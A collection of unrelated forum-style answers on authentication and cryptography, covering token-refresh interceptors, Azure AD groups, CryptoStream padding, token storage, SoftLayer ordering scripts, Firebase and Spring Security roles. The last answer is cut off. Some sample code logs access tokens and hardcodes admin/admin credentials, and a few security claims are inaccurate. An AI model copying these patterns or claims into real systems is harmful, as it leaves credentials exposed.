I had the same problem and I managed to solve it using a ReentrantLock. import java.io.IOException; import java.net.HttpURLConnection; import java.util.concurrent.locks.Lock; import java.util.concurrent.locks.ReentrantLock; import okhttp3.Interceptor; import okhttp3.Request; import okhttp3.Response; import timber.log.Timber; public class RefreshTokenInterceptor implements Interceptor { private Lock lock = new ReentrantLock(); @Override public Response intercept(Interceptor.Chain chain) throws IOException { Request request = chain.request(); Response response = chain.proceed(request); if (response.code() == HttpURLConnection.HTTP_UNAUTHORIZED) { // first thread will acquire the lock and start the refresh token if (lock.tryLock()) { Timber.i("refresh token thread holds the lock"); try { // this sync call will refresh the token and save it for // later use (e.g. sharedPreferences) authenticationService.refreshTokenSync(); Request newRequest = recreateRequestWithNewAccessToken(chain); return chain.proceed(newRequest); } catch (ServiceException exception) { // depending on what you need to do you can logout the user at this // point or throw an exception and handle it in your onFailure callback return response; } finally { Timber.i("refresh token finished. release lock"); lock.unlock(); } } else { Timber.i("wait for token to be refreshed"); lock.lock(); // this will block the thread until the thread that is refreshing // the token will call .unlock() method lock.unlock(); Timber.i("token refreshed. retry request"); Request newRequest = recreateRequestWithNewAccessToken(chain); return chain.proceed(newRequest); } } else { return response; } } private Request recreateRequestWithNewAccessToken(Chain chain) { String freshAccessToken = sharedPreferences.getAccessToken(); Timber.d("[freshAccessToken] %s", freshAccessToken); return chain.request().newBuilder() .header("access_token", freshAccessToken) .build(); } } The main advantage of using this solution is that you can write an unit test using mockito and test it. You will have to enable Mockito Incubating feature for mocking final classes (response from okhttp). Read more about here. The test looks something like this: @RunWith(MockitoJUnitRunner.class) public class RefreshTokenInterceptorTest { private static final String FRESH_ACCESS_TOKEN = "fresh_access_token"; @Mock AuthenticationService authenticationService; @Mock RefreshTokenStorage refreshTokenStorage; @Mock Interceptor.Chain chain; @BeforeClass public static void setup() { Timber.plant(new Timber.DebugTree() { @Override protected void log(int priority, String tag, String message, Throwable t) { System.out.println(Thread.currentThread() + " " + message); } }); } @Test public void refreshTokenInterceptor_works_as_expected() throws IOException, InterruptedException { Response unauthorizedResponse = createUnauthorizedResponse(); when(chain.proceed((Request) any())).thenReturn(unauthorizedResponse); when(authenticationService.refreshTokenSync()).thenAnswer(new Answer<Boolean>() { @Override public Boolean answer(InvocationOnMock invocation) throws Throwable { //refresh token takes some time Thread.sleep(10); return true; } }); when(refreshTokenStorage.getAccessToken()).thenReturn(FRESH_ACCESS_TOKEN); Request fakeRequest = createFakeRequest(); when(chain.request()).thenReturn(fakeRequest); final Interceptor interceptor = new RefreshTokenInterceptor(authenticationService, refreshTokenStorage); Timber.d("5 requests try to refresh token at the same time"); final CountDownLatch countDownLatch5 = new CountDownLatch(5); for (int i = 0; i < 5; i++) { new Thread(new Runnable() { @Override public void run() { try { interceptor.intercept(chain); countDownLatch5.countDown(); } catch (IOException e) { throw new RuntimeException(e); } } }).start(); } countDownLatch5.await(); verify(authenticationService, times(1)).refreshTokenSync(); Timber.d("next time another 3 threads try to refresh the token at the same time"); final CountDownLatch countDownLatch3 = new CountDownLatch(3); for (int i = 0; i < 3; i++) { new Thread(new Runnable() { @Override public void run() { try { interceptor.intercept(chain); countDownLatch3.countDown(); } catch (IOException e) { throw new RuntimeException(e); } } }).start(); } countDownLatch3.await(); verify(authenticationService, times(2)).refreshTokenSync(); Timber.d("1 thread tries to refresh the token"); interceptor.intercept(chain); verify(authenticationService, times(3)).refreshTokenSync(); } private Response createUnauthorizedResponse() throws IOException { Response response = mock(Response.class); when(response.code()).thenReturn(401); return response; } private Request createFakeRequest() { Request request = mock(Request.class); Request.Builder fakeBuilder = createFakeBuilder(); when(request.newBuilder()).thenReturn(fakeBuilder); return request; } private Request.Builder createFakeBuilder() { Request.Builder mockBuilder = mock(Request.Builder.class); when(mockBuilder.header("access_token", FRESH_ACCESS_TOKEN)).thenReturn(mockBuilder); return mockBuilder; } }
This will work, however you have to write a couple of lines of code in your authentication logic in order to achieve what you're looking for. First of all, you have to distinguish between Roles and Groups in Azure AD (B2C). User Role is very specific and only valid within Azure AD (B2C) itself. The Role defines what permissions a user does have inside Azure AD . Group (or Security Group) defines user group membership, which can be exposed to the external applications. The external applications can model Role based access control on top of Security Groups. Yes, I know it may sound a bit confusing, but that's what it is. So, your first step is to model your Groups in Azure AD B2C - you have to create the groups and manually assign users to those groups. You can do that in the Azure Portal (https://portal.azure.com/): Then, back to your application, you will have to code a bit and ask the Azure AD B2C Graph API for users memberships once the user is successfully authenticated. You can use this sample to get inspired on how to get users group memberships. It is best to execute this code in one of the OpenID Notifications (i.e. SecurityTokenValidated) and add users role to the ClaimsPrincipal. Once you change the ClaimsPrincipal to have Azure AD Security Groups and "Role Claim" values, you will be able to use the Authrize attribute with Roles feature. This is really 5-6 lines of code. Finally, you can give your vote for the feature here in order to get group membership claim without having to query Graph API for that.
If the same key and initialization vector are used for encoding and decoding, this issue does not come from data decoding but from data encoding. After you called Write method on a CryptoStream object, you must ALWAYS call FlushFinalBlock method before Close method. MSDN documentation on CryptoStream.FlushFinalBlock method says: "Calling the Close method will call FlushFinalBlock ..." https://msdn.microsoft.com/en-US/library/system.security.cryptography.cryptostream.flushfinalblock(v=vs.110).aspx This is wrong. Calling Close method just closes the CryptoStream and the output Stream. If you do not call FlushFinalBlock before Close after you wrote data to be encrypted, when decrypting data, a call to Read or CopyTo method on your CryptoStream object will raise a CryptographicException exception (message: "Padding is invalid and cannot be removed"). This is probably true for all encryption algorithms derived from SymmetricAlgorithm (Aes, DES, RC2, Rijndael, TripleDES), although I just verified that for AesManaged and a MemoryStream as output Stream. So, if you receive this CryptographicException exception on decryption, read your output Stream Length property value after you wrote your data to be encrypted, then call FlushFinalBlock and read its value again. If it has changed, you know that calling FlushFinalBlock is NOT optional. And you do not need to perform any padding programmatically, or choose another Padding property value. Padding is FlushFinalBlock method job. ......... Additional remark for Kevin: Yes, CryptoStream calls FlushFinalBlock before calling Close, but it is too late: when CryptoStream Close method is called, the output stream is also closed. If your output stream is a MemoryStream, you cannot read its data after it is closed. So you need to call FlushFinalBlock on your CryptoStream before using the encrypted data written on the MemoryStream. If your output stream is a FileStream, things are worse because writing is buffered. The consequence is last written bytes may not be written to the file if you close the output stream before calling Flush on FileStream. So before calling Close on CryptoStream you first need to call FlushFinalBlock on your CryptoStream then call Flush on your FileStream.
Not answered in 7-months! Oh, well for posterity... Inquiry and Paging - Link Layer Connection (Is there anyone out there? Hello!) Inquiry and Paging are procedures and states of the Bluetooth Link Controller during the connection process. The standard progression of states to a connection are as follows: One device performs the Inquiry procedure, a request message for devices within 10-meters to respond, if they are in range. This device is the Master. Devices that are discoverable, will respond with an Inquiry Response. Example: If you turn on the Bluetooth on your phone, it often states it is discoverable and then it will list a number of devices around you. The Master device then will initiate a connection by paging a specific Slave device. If the Slave device is amenable, it will respond with a Page response. Example: On your phone, you select the Bluetooth Headphones to connect with. At that point lots of cool stuff happens so that the radios can match frequency hopping patterns and timing of radio packets. When it's over, and successful, you have a Link Layer connection. Typically, there are two types of connection: Asynchronous Connection-Less (ACL) - Packet data Synchronous Connection Orientated (SCO) - Audio (or video) data, real-time. Pairing (security and remembering past lovers) Bluetooth doesn't need any Security to do Service Discovery (the next stage) but all Bluetooth services need security, so pairing is nearly always done BEFORE Service Discovery BUT it doesn't have to be. In the lowest level of pairing security, it 'just works'. Your phone says, it's connected and that's it. The link is encrypted but did you really connect to your headphones or your sister's down the hall?. Once connected and encrypted like this, the phone may ask you if you want to stay paired with the headphones. If you select 'yes' or tick the box, your phone will remember the encryption and security keys for your headphones (as will your headphones for your phone). The next time they connect, they will recognise each other and just connect and encrypt the link without having to go through pairing again. Now if your connecting your phone to your car by Bluetooth, you probably want better security. There are various options but typically it goes like this. When it comes to pairing, your car system will display something like 'Pairing code 4753495' and your phone will display something similar like 'Verify pairing code 4753495 - Yes/No' - If they match, then you have a really secure connection and you absolutely know that your phone is paired with your car and not you're sister's rubbish Toyota out on the drive. Bluetooth these days is really secure, the latest specs support US Secret Service levels of encryption and for that reason some Bluetooth firmware and devices have strict export restrictions. Older, legacy devices will still use 4-digit pin codes and are less secure. Service Discovery (What can you do?) The Master will ask the Slave to tell it a little about itself and the Slave tells the Master all the cool things it can do. The Master will reciprocate too. With our Headphones and mobile phone example, once you pressed on the Headphones in the list of devices, it will connect, pair and you will get a pop-up saying it supports things like 'Phone Media' (Handsfree / Headset Profiles) and 'Music Media' (Advance Audio Distribution Profile, Audio/Video Remote Control Profile, and some protocols under that). Your car, in addition to Phone and Music Media, can probably do things like browse your Phone's contacts or even display text messages. Profile/Service Connection (Finally) After all that, you're set up. Typically a profile/service level connection doesn't happen until you try and use it .e.g play music or make/receive a phone call but the Link Layer connection is there underneath. So, you can start playing music on your phone and the sweet beats will magically come out of your headphones or car stereo... Until your sister calls.
The @CreatedDate won't work by itself if you just put @EntityListeners(AuditingEntityListener.class) on your entities. In order, it'll work you have to do a little more configuration. Let's say that in your DB the field of @CreatedDate is String type, and you want to return the user that is currently logged in as a value for @CreatedDate, then do this: public class CustomAuditorAware implements AuditorAware<String> { @Override public String getCurrentAuditor() { String loggedName = SecurityContextHolder.getContext().getAuthentication().getName(); return loggedName; } } You can write there any functionality that fits your needs, but you certainly must have a bean that reference to a class that implements `AuditorAware The second part and equally important, is to create a bean that returns that class with annotation of @EnableJpaAuditing, like this: @Configuration @EnableJpaAuditing public class AuditorConfig { @Bean public CustomAuditorAware auditorProvider(){ return new CustomAuditorAware(); } } if your poison is XML configuration then do this: <bean id="customAuditorAware" class="org.moshe.arad.general.CustomAuditorAware" /> <jpa:auditing auditor-aware-ref="customAuditorAware"/>
Yes, and this is very annoying. This is due a registration call. Not only that, onAuthStateChanged is going to be called many times in many different states, with no possibility of knowing which state it is. Documentation says: onAuthStateChanged(FirebaseAuth auth) This method gets invoked in the UI thread on changes in the authentication state: Right after the listener has been registered When a user is signed in When the current user is signed out When the current user changes When there is a change in the current user's token Here some tips to discover the current state: Registration call: skip the first call with a flag. User signed in: user from parameter is != null. User signed out: user from parameter is == null. Current user changes: user from parameter is != null and last user id is != user id from parameter User token refresh: user from parameter is != null and last user id is == user id from parameter This listener is a mess and very bugprone. Firebase team should look into it.
Choosing the storage is more about trade-offs than trying to find a definitive best choice. Let's go through a few options: Option 1 - Web Storage (localStorage or sessionStorage) Pros The browser will not automatically include anything from Web storage into HTTP requests making it not vulnerable to CSRF Can only be accessed by Javascript running in the exact same domain that created the data Allows to use the most semantically correct approach to pass token authentication credentials in HTTP (the Authorization header with a Bearer scheme) It's very easy to cherry pick the requests that should contain authentication Cons Cannot be accessed by Javascript running in a sub-domain of the one that created the data (a value written by example.com cannot be read by sub.example.com) ⚠️ Is vulnerable to XSS In order to perform authenticated requests you can only use browser/library API's that allow for you to customize the request (pass the token in the Authorization header) Usage You leverage the browser localStorage or sessionStorage API to store and then retrieve the token when performing requests. localStorage.setItem('token', 'asY-x34SfYPk'); // write console.log(localStorage.getItem('token')); // read Option 2 - HTTP-only cookie Pros It's not vulnerable to XSS The browser automatically includes the token in any request that meets the cookie specification (domain, path and lifetime) The cookie can be created at a top-level domain and used in requests performed by sub-domains Cons ⚠️ It's vulnerable to CSRF You need to be aware and always consider the possible usage of the cookies in sub-domains Cherry picking the requests that should include the cookie is doable but messier You may (still) hit some issues with small differences in how browsers deal with cookies ⚠️ If you're not careful you may implement a CSRF mitigation strategy that is vulnerable to XSS The server-side needs to validate a cookie for authentication instead of the more appropriate Authorization header Usage You don't need to do anything client-side as the browser will automatically take care of things for you. Option 3 - Javascript accessible cookie ignored by server-side Pros It's not vulnerable to CSRF (because it's ignored by the server) The cookie can be created at a top-level domain and used in requests performed by sub-domains Allows to use the most semantically correct approach to pass token authentication credentials in HTTP (the Authorization header with a Bearer scheme) It's somewhat easy to cherry pick the requests that should contain authentication Cons ⚠️ It's vulnerable to XSS If you're not careful with the path where you set the cookie then the cookie is included automatically by the browser in requests which will add unnecessary overhead In order to perform authenticated requests you can only use browser/library API's that allow for you to customize the request (pass the token in the Authorization header) Usage You leverage the browser document.cookie API to store and then retrieve the token when performing requests. This API is not as fine-grained as the Web storage (you get all the cookies) so you need extra work to parse the information you need. document.cookie = "token=asY-x34SfYPk"; // write console.log(document.cookie); // read Additional Notes This may seem a weird option, but it does has the nice benefit that you can have storage available to a top-level domain and all sub-domains which is something Web storage won't give you. However, it's more complex to implement. Conclusion - Final Notes My recommendation for most common scenarios would be to go with Option 1, mostly because: If you create a Web application you need to deal with XSS; always, independently of where you store your tokens If you don't use cookie-based authentication CSRF should not even pop up on your radar so it's one less thing to worry about Also note that the cookie based options are also quite different, for Option 3 cookies are used purely as a storage mechanism so it's almost as if it was an implementation detail of the client-side. However, Option 2 means a more traditional way of dealing with authentication; for a further read on this cookies vs token thing you may find this article interesting: Cookies vs Tokens: The Definitive Guide. Finally, none of the options mention it, but use of HTTPS is mandatory of course, which would mean cookies should be created appropriately to take that in consideration.
The best practice of authentication is to have a minimum of 2 things you need to remember when you want to login. When a server shows you a login challenge with a username and password, a possible hacker need to figure out two strings of data. But when you only use a password you make it very easy to hack into a application. But you can also use token-based authentication. Just ask your boss what he likes the most. A user can create his own token via his phone or other device where he is already logged in. So you have to login once to create a token for login on a intranet / website. When you want to use only a password, just be sure you can find it in the database. Because some encryption algoritmes can't be reversed. So you can't "un"-hash a password for checking purposes. When you use a token based authentication, you can create a application where the users logs in. Every x minutes (something like 5 or 10) the token expires and he needs to create another one. Every time he creates another code you can add it in the database to relate it to a user / useraccount. When you only use a password for authentication a user a) can be hacked very easily because that will be the only thing a hacker needs to know. And with some bad luck two users can use the same password. Also with this solution you almost can't do it without plain-text passwords or a insecure reversible password encryption to check if the password is correct and related to the user. But to answer your question. Yes it is possible. No it isn't safe No it isn't the best practice
OpenSSL gives two forms of security: authentication through a third party guaranties that you are talking to the server you expect. encryption guaranties that the data you transmit between the two parties (i.e. client and server) can (ideally) not be decrypted and understood. If you can see what you client is sending using packet analysers (e.g. tcpdump or wireshark) then it probably means your client is NOT sending encrypted packet and is NOT using SSL. If you have openssl installed you can test the server by using the following command while tracking the packets: openssl s_client -connect my.server.com:443 Note that I assume the SSL connection is established on port 443 (https). You can then send data to the server by typing it on the command line and this should be encrypted. If you are dealing with a web server than you can type the GET command and it should return the webpage. Of course the received / sent data is decrypted on the terminal but it should be encrypted in the packets observed through wireshark/tcpdump.
Let me elaborate on your question. First of all: You're lucky. There's an (almost) out of the box version for your problem. For social and normal authentication and registration, including email verification etc. you can rely on django-allauth: https://github.com/pennersr/django-allauth django-restauth provides a restful platform built on top of all-auth, so that you don't even have to start building your auth rest api from scratch: https://github.com/Tivix/django-rest-auth When it comes to your db schema, there are a few options. You could go ahead and build your own authentication system, which, in my opinion, is overkill. Rather more, I would implement a profile model, which has a OneToOne relationship to the User model from django.contrib.auth.models.User as described in this chapter of the Django docs. Your models (of course in separated apps) would look like this: from django.contrib.auth.models import User from django.db import models #other imports class UserProfile(models.Model): user = models.OneToOneField(User, related_name='profile') books_read = models.IntegerField(default=0) books_recommended = models.IntegerField(default=0) class Book(models.Model): title = models.CharField(...) author = models.ForeignKey('UserProfile', related_name='books') Another question you will run into is how to update and/or display those nested relations in your serializers. This FAQ article from the django-restauth docs and this chapter of the official django-rest_framework docs will get you jumpstarted. Best, D
I have little Unity experience (other than researching others' questions on this subject) but for the most part I believe you are correct. TinCan.NET should work with Unity based on what others have said, and it provides everything you need to communicate with the LRS (so no need to do your own POST, etc. instead look at the RemoteLRS class methods). In general I would avoid querying the LRS directly for analytics reporting, instead consider it a long lived data store that should be used to populate a reporting tool. Having said that, you can certainly see the data in an LRS. You can access a free LRS at https://cloud.scorm.com (from Rustici Software maintainers of TinCan.NET) by signing up for an account. Note you may run into a common issue with SSL certificate validation and will want to have a look at Mono https webrequest fails with "The authentication or decryption has failed" if you do. I can't speak to the standalone, mobile, web player question, though I'd expect anything supporting .NET should work.
If i have this right then there's a pretty simple solution to your problem. The user is authenticated in the MVC app, which means any calls to the MVC controllers and Action methods are protected and have been successfully authenticated against. Within your MVC app, you are making requests to your WEB API. The Web API needs to protect its resources somehow from incoming requests, and considering that only your MVC app should be responsible for making these requests, you should implement a client secret OAuth flow within your WEB API. Think of it as registering your MVC app as a consumer of your WEB API. Each call from your MVC App to the web api, supplies its clientid and secret that your web api verifies before serving up its resources. From your web api's point of view it doesnt care who the user is, it only cares about the applications that are trying to access its resources. If an application cannot provide a secret, then they dont get access. * EDIT * In a scenario where your web-api is not public facing and requires only authenticated access to its resources, your client browser should no be talking directly to the api. You could use token based authentication where once authenticated by a token endpoint the client browser passes a bearer token in the header of each request made to you api. However, that would mean your passing an access token to the browser and i don't think that's great for security. That is why i would recommenced that client browser only ever makes calls to the MVC app as its living on a server where its calls cant be manipulated and any access token cant be intercepted.
To order a virtual guest with a Mongo DB it’s necessary to use the price id of this item. The best way to verify/place an order with the available price items for any product is to review the next method: http://sldn.softlayer.com/reference/services/SoftLayer_Product_Package/getItemPrices The next script can be used to order a Virtual Guest with MongoDB Community Edition. """ Order Virtual Guest with MongoDB Community Edition. Important manual pages: https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest http://sldn.softlayer.com/reference/services/SoftLayer_Product_Order/placeOrder http://sldn.softlayer.com/reference/services/SoftLayer_Product_Order/verifyOrder License: http://sldn.softlayer.com/article/License Author: SoftLayer Technologies, Inc. <[email protected]> """ import SoftLayer from pprint import pprint as pp USERNAME = 'set me' API_KEY = 'set me' client = SoftLayer.Client(username=USERNAME, api_key=API_KEY) order = { 'complexType': 'SoftLayer_Container_Product_Order_Virtual_Guest', 'quantity': 1, 'virtualGuests': [ {'hostname': 'test-template', 'domain': 'example.com'} ], 'location': 168642, # San Jose 1 'packageId': 46, # CCI Package 'prices': [ {'id': 1640}, # 1 x 2.0 GHz Core {'id': 1644}, # 1 GB RAM {'id': 905}, # Reboot / Remote Console {'id': 272}, # 10 Mbps Public & Private Networks {'id':50231}, # 1000 GB Bandwidth {'id': 21}, # 1 IP Address {'id': 2202}, # 25 GB (SAN) {'id':13945}, # CentOS 6.x - Minimal Install (64 bit) {'id': 55}, # Host Ping Monitoring {'id': 57}, # Email and Ticket Notifications {'id': 58}, # Automated Notification Response {'id': 420}, # Unlimited SSL VPN Users & 1 PPTP VPN User per account {'id': 418}, # Nessus Vulnerability Assessment & Reporting {'id':20893} # MongoDB Community Edition ] } try: # Replace verifyOrder for placeOrder result = client['SoftLayer_Product_Order'].verifyOrder(order) pp(result) except SoftLayer.SoftLayerAPIError as e: pp('Unable to verify/place order faultCode=%s, faultString=%s' % (e.faultCode, e.faultString)) You could review the next link for further information as well: http://sldn.softlayer.com/blog/bpotter/Going-Further-SoftLayer-API-Python-Client-Part-3 UPDATE An object mask would be the best way to retrieve additional object's data, like the item price ids of an instance already created. You can use this mask: mask[billingItem[orderItem,children[orderItem]]] Or this one, which is more granular: mask[billingItem[id,orderItem[itemPriceId],children[id,orderItem[itemPriceId]]]] In python you could use these masks in this way: """ Get Virtual Guest and its itme price ids Important manual pages: https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest/getObject https://sldn.softlayer.com/article/object-masks License: http://sldn.softlayer.com/article/License Author: SoftLayer Technologies, Inc. <[email protected]> """ import SoftLayer from pprint import pprint as pp USERNAME = 'set me' API_KEY = 'set me' virtualGuestId = 25129311 client = SoftLayer.Client(username=USERNAME, api_key=API_KEY) objectMask = 'mask[billingItem[id,orderItem[itemPriceId],children[id,orderItem[itemPriceId]]]]' try: result = client['SoftLayer_Virtual_Guest'].getObject(id=virtualGuestId, mask=objectMask) pp(result) except SoftLayer.SoftLayerAPIError as e: pp('Unable to get virtual guest faultCode=%s, faultString=%s' % (e.faultCode, e.faultString)) Regarding the ssh keys, you just need to add this line into the order object of the above script (the one to order a virtual guest with mongo db) 'sshKeys': [{'sshKeyIds': [214147, 94206]}]
Try the following script: import SoftLayer import json from pprint import pprint as pp productOrder = { "quantity": 1, "location": 1441195, "packageId": 251, #"sshKeyIds": 248873, "hardware": [ { "hostname": "db2oncloud-tshirt-plan-customer-#-letter-datacenter", "primaryNetworkComponent": { "networkVlan": { "id": 1351859 } }, "domain": "bluemix.net", "primaryBackendNetworkComponent": { "networkVlan": { "id": 1351879 } } } ], "prices": [ { "id": 50691, "description": "Dual Intel Xeon E5-2620 v3 (12 Cores, 2.40 GHz)" }, { "id": 49437, "description": "128 GB RAM" }, { "id": 49081, "description": "Red Hat Enterprise Linux 7.x (64 bit) (per-processor licensing)" }, { "id": 35686, "description": "10 Gbps Redundant Public & Private Network Uplinks" }, { "id": 34241, "description": "Host Ping and TCP Service Monitoring" }, { "id": 34996, "description": "Automated Reboot from Monitoring" }, { "id": 50359, "description": "500 GB Bandwidth" }, { "id": 33483, "description": "Unlimited SSL VPN Users & 1 PPTP VPN User per account" }, { "id": 141833, # Disk0 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 141833, # Disk1 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 141833, # Disk2 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 141833, # Disk3 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 141833, # Disk4 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 141833, # Disk5 "description": "1.2 TB SSD (10 DWPD)" }, { "id": 50143, # Disk6 "description": "800 GB SSD (10 DWPD)" }, { "id": 50143, # Disk7 "description": "800 GB SSD (10 DWPD)" }, { "id": 141965, "description": "DISK_CONTROLLER_RAID_10" }, { "id": 32500, "description": "Email and Ticket" }, { "id": 35310, "description": "Nessus Vulnerability Assessment & Reporting" }, { "id": 34807, "description": "1 IP Address" }, { "id": 25014, "description": "Reboot / KVM over IP" } ], "sshKeys": [ { "sshKeyIds":[248873] } ], "storageGroups": [ { "arraySize": 100, "arrayTypeId": 5, # Raid 10 "hardDrives": [ 0, 1, 2, 3, 4, 5 ], "partitionTemplateId": 1, # Linux Basic "partitions": [ { "isGrow": True, "name": "/ssd_disk1", "size": 3501 } ] }, { "arraySize": 800, "arrayTypeId": 2, # Raid 1 "hardDrives": [ 6, 7 ], "partitions": [ { "isGrow": True, "name": "/ssd_disk2", "side": 800 } ] } ] } #client = Client(username=USERNAME, api_key=API_KEY) client = SoftLayer.Client(username=&apikey) order = client['Product_Order'].verifyOrder(productOrder) pp(order)
The Active Directory Authentication Library (ADAL) for JavaScript helps you to use Azure AD for handling authentication in your single page applications. This library is optimized for working together with AngularJS. Based on the investigation, this issue is caused by the handleWindowCallback. The response not able to run into the branch for if ((requestInfo.requestType === this.REQUEST_TYPE.RENEW_TOKEN) && window.parent && (window.parent !== window)) since it is not used in the Angular enviroment. To integrate Azure AD with MVC application, I suggest that you using the Active Directory Authentication Library. And you can refer the code sample here. Update if (isCallback) { // x.handleWindowCallback(); var requestInfo=x.getRequestInfo(window.location.hash); //get the token provided resource. to get the id_token, we need to pass the client id var token = x.getCachedToken("{clientId}") x.saveTokenFromHash(requestInfo); } else { x.login(); }
You mention "Within our corporate intranet". Depending on how the end-points are secured, option 1 could be challenging. Angular will run in a web-browser so if those services are only accessible via VPN / intranet, the web-app will only work if your computer is connected to that intranet (i.e. it won't work if you run it from home). Another security challenge with option 1 is that if the end-points require special authentication "secrets" (API tokens, passwords, certificates, etc.), those secrets will be exposed and visible to anyone who uses the web-app since anyone can see the traffic between their browser and the server. With option 2, those secrets can stay hidden behind your middle layer. Lastly, even if Angular talks to those end-points directly, you will still need to have the HTML / JS / CSS hosted on some web-server. You may not need a full blown application server but you'll need something to point your web browser at. If those concerns don't apply to your case, then it's really up to you to pick whichever option you and your team are the most comfortable with.
char* encrypt(char * plainText, ... ); char* decrypt(char * cipher, ... ); You can also avoid encryptString and decryptString and the extra copy. I'll show you the encrypt, the decrypt is similar. char* encrypt(char * plainText, byte key[], int sizeKey, byte iv[], int sizeIV, long &len) { const unsigned long plainTextLen = len; len = 0; const unsigned long extraLen = plainTextLen+16; ArraySource source(plainText, plainTextLen, false); unique_ptr<char[]> writable(new char[extraLen]); ArraySink sink(writable, extraLen); CTR_Mode< AES >::Encryption enc; enc.SetKeyWithIV(key, sizeKey, iv, sizeIV); source.Detach(new StreamTransformationFilter(enc, new Redirector(sink))); source.PumpAll(); len = sink.TotalPutLength(); return writable.release(); } I did not compile and run it, so you will have to clear the compiler issues in the code above. They should all be minor, like conversions and casts. You usually don't need to worry about the NULL; just use the ptr and len. You can create a std::string from the decrypted ciphertext with string recovered = string(ptr, len);. std::string will produce a NULL when needed, but its usually not needed. Detach is not a typo. You use it to Attach a new filter and delete a previous filter. You use it to avoid memory leaks.
Firebase won't allow duplicate user (names) so just look for an error when you try to create the user. FIRAuth.auth()?.createUser(withEmail: email, password: password) { (user, error) in // ... } There are 4 errors that could be returned: FIRAuthErrorCodeInvalidEmail Indicates the email address is malformed. FIRAuthErrorCodeEmailAlreadyInUse (this is the one to address you question) Indicates the email used to attempt sign up already exists. Call fetchProvidersForEmail to check which sign-in mechanisms such user used, and prompt the user to sign in with one of those. FIRAuthErrorCodeOperationNotAllowed Indicates that email and password accounts are not enabled. Enable them in the Authentication section of the Firebase console. FIRAuthErrorCodeWeakPassword Indicates an attempt to set a password that is considered too weak. The NSLocalizedFailureReasonErrorKey field in the NSError.userInfo dictionary object will contain more detailed explanation that can be shown to the user.
In Authenticate with a backend server you can see this warning: Do not accept plain user IDs, such as those you can get with the GoogleSignInAccount.getId() method, on your backend server. A modified client application can send arbitrary user IDs to your server to impersonate users, so you must instead use verifiable ID tokens to securely get the user IDs of signed-in users on the server side. So if you want to authenticate user with backend you'll need to get call getIdToken() on android, send it to server, verify received token on server (here you need to check client id) Why it is important? In this same chapter you can read: The value of aud in the ID token is equal to one of your app's client IDs. This check is necessary to prevent ID tokens issued to a malicious app being used to access data about the same user on your app's backend server. For authentication purposes you can use ClientId from credentials for Android. Web credential is required if you want to use server side access to API's on behalf of user. In that case you'll need web credential, because it contains in addition clientSecret, witch is necessary to exchange received token to access and refresh tokens.
You've set to an impossible task. The problem is that by hardcoding the key into the program, as you've noted, the user can still get the key by reverse engineering. If you put it in a file somewhere, the program needs to be able to read it, and therefore the user can also access it in the same way. The fundamental problem you have is that the software needs to access the key, and for that, the key must be stored somewhere it's reachable by the user too. It can be within the binary or in the computer, but the binary can be analyzed and the file system can be inspected. Encrypting a file protects the key, but just recreates the problem with the new key. This is also the very same problem that all DRM schemes face. They give users access to the the full software but want to limit it in some ways, but the user has everything in his computer to run the software. That's why it's always possible to pirate every desktop software, if enough effort is put towards it. You only can make it more difficult by obfuscating the key. But what can you do then? An alternative approach is to not have the user to have the DB credentials at all. Or make them useless for anything significant. I can think of two approaches here: Have the system communicate with a webservice and never to the DB directly. This way, the user only knows the address of the server and the WS can request any authentication as needed, before going to the DB. The WS is then the only one to ever touch the DB. This is what all websites do in practice, the visitor doesn't ever sees the DB, but interacts with it though the web server. Another option would be to give the user direct DB access, but those credentials only give permission to call some stored procedures (or access views without sensitive data) and those in turn request some sort of authentication before proceeding. This way the DB credential becomes not that sensitive as long as its permissions are kept to the bare minimum and privileged actions are properly validated before proceeding.
First, you generally shouldn't use the same certificate for both the web and mail servers. The basic setup is that the web server should have a cert for www.whatever.com with whatever.com as an alternate name (or maybe the reverse), and the mail server will have a cert for something like mail.whatever.com, or whatever its host name is. Note that the mail server's cert should be for its hostname, not the domain it serves for. It's entirely normal to have a mail server that isn't even under the same top-level domain as the domain it's serving for -- if there's an MX record in the DNS that says mail for whatever.com should go to someserver.isp.net, that's completely normal, and the mail server needs a cert for someserver.isp.net, not whatever.com. Second, it sounds like you're trying to over-automate this. If you did need the same cert on multiple computers, you should generally copy it manually between the servers (using e.g. scp between unprivileged accounts), and then install it manually on each server. On the other hand, if you're using an automated cert generation system like letsencrypt's, you're probably better off generating independent certs on each server. There's a significant security risk with allowing automated privilege escalation, like allowing rsync to run as root via sudo. Unless you're very careful, anyone with any access to the system could take advantage of this to e.g. modify any file they want (including /etc/sudoers) simply by doing it with rsync! Similarly, allowing one server to remote into another as root means anyone who can take over one server automatically gets full control of the other. This is dangerous! Don't do it unless you really need to, and in that case you need to really really understand exactly what you're doing.
Yes. Issue is with your ant matchers. As per my understanding, when you say anyRequest.permitAll , it doesn't comply with antMatchers("/admin/*").access("hasRole('ROLE_ADMIN')") because you're telling web security to allow every request to go through without authorization. Change as below, http.authorizeRequests() .antMatchers("/login").permitAll() .antMatchers("/admin/**").access("hasRole('ADMIN')") .and().formLogin().loginPage("/login") https://github.com/satya-j/rab/blob/master/src/main/java/com/satya/rab/config/WebSecurityConfig.java - refer to this, its my repo where I had earlier tried out with spring security. EDIT: Here is an update WebSecurityConfig .antMatchers("/login").permitAll() .antMatchers("/admin/**").access("hasRole('ADMIN')") .antMatchers("/**").access("hasRole('USER')") .and() .formLogin().loginPage("/login") .usernameParameter("username") .passwordParameter("password") .defaultSuccessUrl("/index") .failureUrl("/login?error"); You can use a authentication provider of your choice to set roles based on the user. CustomeAuthenticationProvider @Component("authProvider") public class CustomAuthenticationProvider implements AuthenticationProvider { @Override public Authentication authenticate(Authentication auth) throws AuthenticationException { String username = auth.getName(); String password = auth.getCredentials().toString(); if(username.equals("user") && password.equals("user")) { List<GrantedAuthority> grantedAuths = new ArrayList<GrantedAuthority>(); grantedAuths.add(new SimpleGrantedAuthority("ROLE_USER")); return new UsernamePasswordAuthenticationToken(username, password, grantedAuths); } else if(username.equals("admin") && password.equals("admin")) { List<GrantedAuthority> grantedAuths = new ArrayList<GrantedAuthority>(); grantedAuths.add(new SimpleGrantedAuthority("ROLE_ADMIN")); grantedAuths.add(new SimpleGrantedAuthority("ROLE_USER")); return new UsernamePasswordAuthenticationToken(username, password, grantedAuths); } else { 